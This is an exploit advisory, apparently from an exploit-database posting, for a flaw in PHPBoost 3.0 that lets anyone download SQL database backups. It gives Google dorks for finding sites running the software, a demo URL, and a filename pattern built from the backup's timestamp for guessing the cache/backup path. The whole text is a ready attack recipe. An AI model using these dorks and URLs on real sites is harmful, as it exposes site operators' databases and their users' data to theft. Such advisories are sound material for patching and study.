PHPBoost is a content management system. PHPBoost has a Remote File Download Vulnerability, which may cause remote download of. SQL files for backup.
[+] Info:
~~~~~~~~~
# Title: PHPBoost 3.0 Remote Download Backup Vulnerability
# Author: KedAns-Dz
# E-mail: ked-h@hotmail.com
# Home: HMD/AM (0, 30008/04300)-Algeria-(00213555248701)
# Twitter page: twitter.com/kedans
# Platform: php
# Impact: Download Backup Database (*. SQL) File
# Tested on: Windows XP sp3 FR
###
# Note: BAC 2011 Enchallah (Me & BadR0 & Dr. Ride & Red1One & XoreR & Fox-Dz... all)
##
# [»] ~ Special thanks to: Dr. Ride
##
# Go0gle Dorks:
#1> "Powered by PHPBoost 3.0"
#2> "Boost é par PHPBoost 3.0"
[+] Poc:
~~~~~~~~~
# Demo:
Http: /// [localhost]/[path]/cache/backup/backup_phpboost_11-03-29-17-35-34. SQL
# Exploit:
Http: // [localhost]/[path]/cache/backup _ [sitname] _ * Y * M * D * H * Mn * S *. SQL
% {
Y = year
M = month
D = day
Mn = minute
S = second
} %
# Download The Backup. SQL File ** The Access Not Forbidden **